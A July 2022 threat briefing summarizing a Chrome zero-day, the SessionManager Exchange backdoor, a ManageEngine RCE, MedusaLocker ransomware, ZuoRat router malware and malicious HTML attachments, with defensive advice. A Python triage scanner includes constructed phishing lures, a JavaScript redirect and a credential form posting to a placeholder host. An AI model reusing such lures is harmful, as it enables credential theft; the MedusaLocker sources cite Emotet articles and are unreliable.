    Date: 7/5/2022

    Google Chrome Zero-Day

    Overview

    Google Chrome is affected by a zero-day vulnerability that is being exploited in the wild. The vulnerability is tracked as CVE-2022-2294 and relates to a heap overflow flaw in a component that provides real-time audio and video communication capabilities. 

    Potential Impact

    Heap buffer overflow vulnerabilities can lead to an attacker executing arbitrary code and potentially evading active security defenses. This vulnerability also impacts the Android version of Chrome. 

    Recommended Actions

    Users should update Chrome to version 103.0.5060 for Windows, macOS, and Linux. To install Chrome updates, click the three dots in the upper right side of Chrome, select Settings, and then click “About Chrome.” Android users should update to version 103.0.5060.71.


      SessionManager Backdoor

      Overview

      Newly discovered malware has been in the wild since March 2021 and is used to backdoor Internet-facing Microsoft Exchange servers. The malware disguises itself as a module for Internet Information Services (“IIS”) and has been deployed after exploiting past ProxyLogon flaws within Exchange. This malware has been dubbed SessionManager.

      Potential Impact

      IIS modules used as backdoors allow malicious actors to maintain persistence stealthily and perform a wide range of actions, such as collecting emails or launching further attacks inside a victim’s network. Attackers have used this backdoor access to deploy reconnaissance and credential harvesting tools.

      Recommended Actions

      Organizations should primarily ensure that Internet-facing Microsoft Exchange servers are up to date. It is strongly recommended that these systems be protected by Endpoint Detection & Response (“EDR”) tools with strong monitoring capabilities. Administrators should also consider disabling public access to the Exchange Control Panel (“ECP”) and the Offline Address Book (“OAB”). 

      Sources

      https://thehackernews.com/2022/07/new-sessionmanager-backdoor-targeting.html
      https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/

      ManageEngine ADAudit Exploit

      Overview

      Researchers have published technical details for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activities in Active Directory. The vulnerability allows for unauthenticated remote code execution. However, an attacker would need access to the internal network before exploitation unless ADAudit Plus services are accessible from the Internet.

      Potential Impact

      Exploitation permits attackers to execute arbitrary code, upload files, steal account credentials, and potentially leverage ADAudit Plus functionality to deploy malware on all Active Directory managed systems. 

      Recommended Actions

      Ensure that ADAudit Plus instances are running build 7060. Administrators should also ensure access to ADAudit Plus is restricted and leverage separate service accounts with limited privileges. 

      Sources
      https://www.bleepingcomputer.com/news/security/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit/

      MedusaLocker Ransomware Attack Increase

      Overview

      The FBI, CISA, and FinCEN have issued joint advisories highlighting a recent increase in MedusaLocker ransomware attacks. These new attacks are attributed explicitly to Remote Desktop Protocol (RDP) access to the victim network. Post-exploitation activities include the detonation of MedusaLocker and the creation of ransom notes pointing to various Bitcoin wallet addresses.

      Most attacks have seen an initial compromise via phishing emails that include RDP exploits. Secondary actions include utilizing PowerShell scripts to propagate the ransomware throughout the network. The attacks have also been killing the primary process of any well-known security and forensic software to maintain persistence. The final activity in the kill-chain is the deployment of AES-256 and RSA-2048 algorithms to mass encrypt files and folders. 

      Potential Impact

      MedusaLocker has been an incredibly successful ransomware variant with a large attack surface since 2019. By combining sophisticated kill chains with well-established encryption standards, these attacks can have a massive impact on victim networks. Organizations should be on the lookout for these attacks and take appropriate actions.

      Recommended Actions

      First and foremost, organizations should be utilizing strong email security and Endpoint Detection and Response products. This will significantly impact the attack surface of the MedusaLocker’s initial access point, most commonly phishing. 

      Additionally, organizations should have tested and up-to-date recovery plans if a ransomware attack is successful. This should include the ability to retain and restore sensitive or proprietary data through backups and copies of critical data. 

      Implementing network segmentation and maintaining offline backups of data are also advised.

      Sources
      https://thehackernews.com/2022/03/emotet-botnets-latest-resurgence.html
      https://thehackernews.com/2022/02/reborn-of-emotet-new-features-of-botnet.html

      HTML Attachment Advisory

      Overview

      Researchers at Barracuda Networks have published an alarming statistic that one in five HTML email attachments contain malicious logic. 

      This statistic was found after the Barracuda team analyzed millions of attachments that passed Barracuda systems over a multi-month period. Each of these attachments was scanned and compared to similar attachments. Of these millions of attachments, 21% of all HTML attachments were found malicious.

      Barracuda reported that attackers had embedded HTML attachments in emails disguised as weekly reports. This tricks users into clicking on phishing links.

      Potential Impact

      The Barracuda team has observed attackers using these HTML attachments for multiple kinds of attacks. The primary method is credential phishing: attackers include links to phishing sites within the HTML that, when opened, use JavaScript to redirect to a third-party machine and request credentials. Similarly, some attachments contain links that attempt to download malware directly onto user machines. Beyond that, some attachments don’t forward users to fake websites at all. Instead, they embed phishing forms directly in the attachment, delivering the phishing site as the attachment itself rather than as a redirecting link.

      Recommended Actions

      Organizations can strengthen their security against malicious HTML attachments in a few ways. First, organizations should ensure that their deployed email security products are configured to scan and block malicious email attachments, especially HTML documents. Barracuda specifically recommends solutions that include machine learning and static code analysis to evaluate an email’s content, not just the attachment(s).

      Secondly, training users to identify and report malicious attachments is essential. This can significantly reduce the chances of users falling victim to these phishing attacks.

      Lastly, if an attack is successful, having robust Endpoint Detection and Response capabilities is key to protecting potentially compromised endpoints.
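As an added illustration of the static checks described above (example code written for this briefing, not Barracuda's or any vendor's tooling; the three sample attachments are constructed), a small Python triage scanner that flags inline scripts, script-driven redirects, meta refreshes, password inputs, and forms that post to a remote host:

```python
import re
from html.parser import HTMLParser

# Constructed sample attachments: a benign "weekly report", a JavaScript
# redirector, and an attachment with a phishing form embedded directly in it.
BENIGN_REPORT = """<html><body><h1>Weekly Report</h1>
<table><tr><td>Tickets closed</td><td>42</td></tr></table></body></html>"""

REDIRECTOR = """<html><body><p>Loading your report...</p>
<script>window.location.href="https://example.invalid/login";</script>
</body></html>"""

EMBEDDED_FORM = """<html><body><h2>Sign in to view the report</h2>
<form action="https://example.invalid/collect" method="post">
<input type="email" name="user"><input type="password" name="pass">
<input type="submit" value="Sign in"></form></body></html>"""

REDIRECT_JS = re.compile(r"(location\.(href|replace|assign)|window\.open)")


class AttachmentScanner(HTMLParser):
    """Collects static indicators that an HTML attachment is a phishing lure."""

    def __init__(self):
        super().__init__()
        self.indicators = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":                      # a report should not need code
            self.indicators.append("script")
            self._in_script = True
        elif tag == "form" and a.get("action", "").startswith(("http://", "https://")):
            self.indicators.append("form_posts_to_remote_host")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.indicators.append("password_field")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.indicators.append("meta_refresh_redirect")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here; look for the redirect idioms the lures use.
        if self._in_script and REDIRECT_JS.search(data):
            self.indicators.append("script_redirect")


def scan_html_attachment(html: str) -> dict:
    """Return the sorted indicator set and a simple suspicious verdict."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    found = sorted(set(scanner.indicators))
    return {"indicators": found, "suspicious": bool(found)}
```

A mail gateway would quarantine or detonate anything flagged rather than block on the verdict alone, since legitimate exports can also carry scripts.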

      Sources
      https://blog.barracuda.com/2022/06/28/threat-spotlight-malicious-html-attachments/

      ZuoRat Router Malware Campaign Exhibits Dangerous Capabilities and Behavior

      Overview

      Lumen Technologies “Black Lotus Labs” division published a report about a router malware campaign. 

      The campaign targets “more than eighty SOHO router models, including ones from Asus, Cisco, DrayTek, and Netgear.” 

      Black Lotus Labs has observed the malware capturing network traffic, scanning home networks, and infecting hosts on victim networks with command and control infrastructure such as Cobalt Strike. 

      The sophistication level of the malware suggests that a nation-state threat actor might be behind the campaign.

      Potential Impact

      The report did not include information regarding the suspected end-goals of the attackers, but considering the observed activity, the potential is limitless. The campaign infects SOHO (Small-Office/Home-Office) routers, which are a willful blind spot for those managing corporate technology in the “Work From Anywhere” (WFA) environment that most of us find ourselves in. Understandably, these technology managers must draw a line regarding what they manage, and that demarcation point is often the management of users’ home networks. In the WFA environment, an infected home network can have the same impact as an infected corporate network, ranging from espionage to exfiltration to ransomware.

      Recommended Actions

      The most secure end of the WFA spectrum includes corporations supplying and managing Internet connections and networking equipment for all employees. Because employee home networks are primarily out of control of most corporate IT departments, a meticulous focus on IT asset configuration management and Endpoint Detection and Response (EDR) configuration is helpful in the WFA environment. Corporations leveraging the WFA model should, at the very least, include language in policies requiring employees to maintain home network equipment at the highest available patch level.  

      Sources
      https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/?utm_source=referral&utm_medium=press+release
      https://www.wired.com/story/zuorat-trojan-malware-hacking-routers/
